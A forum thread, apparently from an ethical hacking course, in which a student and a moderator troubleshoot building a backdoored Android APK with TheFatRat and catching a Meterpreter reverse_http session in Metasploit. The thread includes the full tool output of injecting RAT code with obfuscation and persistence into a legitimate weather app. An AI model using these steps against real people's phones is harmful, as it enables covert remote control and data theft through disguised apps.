- This topic has 11 replies, 3 voices, and was last updated 1 year, 5 months ago by Diego Pérez.
- AuthorPosts
- June 3, 2023 at 5:42 pm #72800buystuff1234Participant
Hello,
I get this error message when in fatrat trying to create the apk. I follow the instructions from the course. But maybe the issue has to do with the part that when run ´update-alternatives –config java´ i get as options javaversion 17 and java 11, i tried them both, but receive the same error. So not able to choose version 8 as the course says.
Thank you in advanceJune 3, 2023 at 6:57 pm #72803Diego PérezModeratorHi!
The image wasn’t uploaded, can you try it again?Greetings!
DiegoJune 4, 2023 at 12:40 pm #72814buystuff1234ParticipantHey Diego,
Here is the screenshot, but also i tried a different application instead the flappy bird from the course. When i used angry birds it completed the apk succesfully. And i follow all the following steps. Moving it to my /var/www/html/evil-files/ and setting up a new listener on metasploit. Using exploit/multi/handler/, Setting payload /android/meterpreter/reverse_http (tried tcp as well) setting lhost to my ip adress and setting lport 8080 (tried 4444 also).
Then exploit to listen to new incoming agents
Running apache2 and using an android phone to download the application. Which all goes without issues, i download and install the application from the apache server but i dont get the meterpreter session. What am i missing?June 5, 2023 at 9:21 pm #72825Diego PérezModeratorHi!
Unfortunately the images are not uploading, maybe upload them to google drive and share the link here.
Also, for this attack to work you need a wireless adapter, do you have one?
Make sure that you’re using the same payload when generating the backdoor and when using multi handler, if you’re already doing that then try using a different port, if you’re still having issues then please show me the following please:
1. Result of ifconfig and route -n in Kali.
2. The ip of the phone.
3. The options used for generating the backdoor fatrat.
4. The result of show options before running the multi handler.Let me know.
DiegoJune 26, 2023 at 3:58 pm #73124buystuff1234ParticipantHello Diego,
Why do i need to use a wireless adapter? The course says nothing about a wireless adapter.
Here the course tells you to create a malicious apkfile and then place it in your evil-files on your apache server.
And downloading it with a android device that is connected to the same network. I have a wireless adapter if needed.
Im failing to get the meterpreter session.June 26, 2023 at 9:32 pm #73130Diego PérezModeratorHi!
Well, you need a wireless adapter because a mobile phone can’t connect to the virtual network created by VMware hence we need to connect kali to the real network and that’s the use of the wireless adapter. So, connect the adapter to the network and create a malicious APK using the ip of the wireless adapter interface (usually wlan0) as LHOST.Greetings!
DiegoJuly 5, 2023 at 3:58 pm #73225buystuff1234ParticipantHello Diego,
I did what you said, used the wlan0 ip adress to create the apk. but still didnt get a meterpreter session. i also tried lport 4444, but without result.
Any ideas what i could do different?
ThanksJuly 5, 2023 at 9:39 pm #73229Diego PérezModeratorHi!
Make sure that you’re using the same payload when generating the backdoor and when using multi handler, if you’re already doing that then try using a different port, if you’re still having issues then please show me the following please:
1. Result of ifconfig and route -n in Kali.
2. ip of the device.
3. The result of options before generating the malicious APK.
4. The result of show options before running the multi handler.Let me know.
DiegoJuly 6, 2023 at 12:54 pm #73239buystuff1234Participanteth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.100.238 netmask 255.255.255.0 broadcast 192.168.100.255
inet6 fe80::20c:29ff:fe7e:b94e prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:7e:b9:4e txqueuelen 1000 (Ethernet)
RX packets 4825 bytes 2941520 (2.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5780 bytes 891394 (870.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1004 bytes 106816 (104.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1004 bytes 106816 (104.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.8.0.2 netmask 255.255.0.0 destination 10.8.0.2
inet6 fdda:d0d0:cafe:1194::1000 prefixlen 64 scopeid 0x0<global>
inet6 fe80::44b1:5bb1:12d2:e76e prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 3229 bytes 1507100 (1.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4378 bytes 445050 (434.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2312
inet 192.168.100.106 netmask 255.255.255.0 broadcast 192.168.100.255
inet6 fe80::7bae:4f96:fdb:22b9 prefixlen 64 scopeid 0x20<link>
ether 00:13:ef:f4:00:60 txqueuelen 1000 (Ethernet)
RX packets 292 bytes 173648 (169.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18 bytes 2738 (2.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0oot@kali:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 10.8.0.1 128.0.0.0 UG 0 0 0 tun0
0.0.0.0 192.168.100.1 0.0.0.0 UG 100 0 0 eth0
0.0.0.0 192.168.100.1 0.0.0.0 UG 600 0 0 wlan0
10.8.0.0 0.0.0.0 255.255.0.0 U 0 0 0 tun0
128.0.0.0 10.8.0.1 128.0.0.0 UG 0 0 0 tun0
185.213.154.134 192.168.100.1 255.255.255.255 UGH 0 0 0 eth0
192.168.100.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
192.168.100.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0
root@kali:~#IP device: 192.168.100.129
[ ]===========================================================================[ ]
[ ] [ ]
[ ] ) ( ) ) ( ( ) [ ]
[ ] ( ( ( ( /( )\ ) ( /( ( /( )\ ) )\ ) ( /( ( [ ]
[ ] )\ )\ )\ )\())(()/( )\()) )\()) (()/((()/( )\()) )\ ) [ ]
[ ] ((_)((((_)( (((_) |((_)\ /(_)) ((_)\ ((_)\ /(_))/(_))((_)\ (()/( [ ]
[ ] (_) )\_ )\ )\___ |_ ((_)(_))_ ((_) ((_) (_)) (_)) _((_) /(_))_ [ ]
[ ] | _ ) (_)_\(_)((/ __|| |/ / | \ / _ \ / _ \ | _ \|_ _| | \| |(_)) __|[ ]
[ ] | _ \ / _ \ | (__ ‘ < | |) || (_) || (_) || / | | | .` | | (_ |[ ]
[ ] |___/ /_/ \_\ \___| _|\_\ |___/ \___/ \___/ |_|_\|___| |_|\_| \___|[ ]
[ ]===========================================================================[ ]
[ ] Embed a Metasploit Payload in an original .apk files [ ]
[ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ]
[ ]===========================================================================[ ]Cleaning Temp files
Done!Your local IPV4 address is : 192.168.100.106
Your local IPV6 address is : fe80::7bae:4f96:fdb:22b9
Your public IP address is :
Your Hostname is :Set LHOST IP: 192.168.100.106
Set LPORT: 8080
Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)
Path : /root/Downloads/buienradar.apk
Testing your apk before next step …
+——————————————-+
| [ 1 ] android/meterpreter/reverse_http |
| [ 2 ] android/meterpreter/reverse_https |
| [ 3 ] android/meterpreter/reverse_tcp |
| [ 4 ] android/shell/reverse_http |
| [ 5 ] android/shell/reverse_https |
| [ 6 ] android/shell/reverse_tcp |
+——————————————-+Choose Payload : 1
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
+————————————-+
| [ 1 ] Use Backdoor-apk 0.2.4a |
| [ 2 ] Use old Fatrat method |
| [ 3 ] Use MsfVenom Embedded method |
+————————————-+Select Tool to create apk : 1
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$
Generate Backdoor
+————++————————-++———————–+
| Name || Descript || Your Input
+————++————————-++———————–+
| LHOST || The Listen Addres || 192.168.100.106
| LPORT || The Listen Ports || 8080
| OUTPUTNAME || The Filename output || app_backdoor.apk
| PAYLOAD || Payload To Be Used || android/meterpreter/reverse_http
+————++————————-++———————–+________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
/__________\
________|__________|__________________________________________
/____________\
|____________| Dana James Traversie[*] Running backdoor-apk.sh v0.2.4a on Thu Jul 6 07:29:27 AM EDT 2023
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[*] Decompiling original APK file…done.
[*] Locating smali file to hook in original project…done.
[+] Package where RAT smali files will be injected: com/supportware/Buienradar
[+] Smali file to hook RAT payload: nl/rtl/buienradar/BuienradarApplication.smali
[*] Generating RAT APK file…done.
[*] Decompiling RAT APK file…done.
[*] Merging permissions of original and payload projects…done.
[*] Injecting helpful Java classes in RAT APK file…done.
[*] Creating new directory in original package for RAT smali files…done.
[+] Inject package path: com/supportware/Buienradar/anvzv
[+] Generated new smali class name for MainBroadcastReceiver.smali: Xoodj
[+] Generated new smali class name for MainService.smali: Omede
[+] Generated new smali class name for Payload.smali: Xiqlw
[+] Generated new smali class name for StringObfuscator.smali: Mvtrc
[+] Generated new smali method name for StringObfuscator.obfuscate method: ludhu
[+] Generated new smali method name for StringObfuscator.unobfuscate method: wgycs
[*] Copying RAT smali files to new directories in original project…done.
[*] Fixing RAT smali files…done.
[*] Obfuscating const-string values in RAT smali files…Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
done.
[*] Adding hook in original smali file…done.
[*] Adding persistence hook in original project…done.
[*] Recompiling original project with backdoor…done.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=trueWarning:
The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=trueWarning:
The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
[*] Generating RSA key for signing…done.
[*] Signing recompiled APK…done.
[*] Verifying signed artifacts…done.
[*] Aligning recompiled APK…done.[*] Backdoor apk created succefully
Your RAT apk was successfully builded and signed , it is located here :
~/Fatrat_Generated/app_backdoor.apkDo you want to create a listener for this configuration
to use in msfconsole in future ?Choose y/n :
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
—- ————— ——– ———–Payload options (android/meterpreter/reverse_http):
Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.100.106 yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP PathExploit target:
Id Name
— —-
0 Wildcard Targetmsf6 exploit(multi/handler) >
July 6, 2023 at 9:24 pm #73245Diego PérezModeratorHi!
Cool, are you able to reach kali’s web server from your phone?
You can also try to use a different payload, try with the tcp one. Or even use a different APK.Greetings!
DiegoJuly 26, 2023 at 11:13 pm #74512Hossam H.I.MParticipantHi diego, am wondering why kali windows 64 bit it became Apple M1 after instillation. Everything was going well until I realized that kali written on it Apple on the program, than when I tried it It won’t work saying that the version is not correct. I delete it and do it again the same, I deleted again with 7 Zip and VMware also same problem plus when I reinstalled 7 Zip and extracted it, it didn’t not extracted like the first time and extracted another files. I troubleshoot the PC and and recovered windows defaults.
July 27, 2023 at 8:58 pm #74530Diego PérezModeratorHI!
It seems you are downloading the wrong version, if you are using windows make sure to follow the instructions as in the windows installation lecture and use the exact same link that Zaid points out.Greetings!
Diego - AuthorPosts
- You must be logged in to reply to this topic.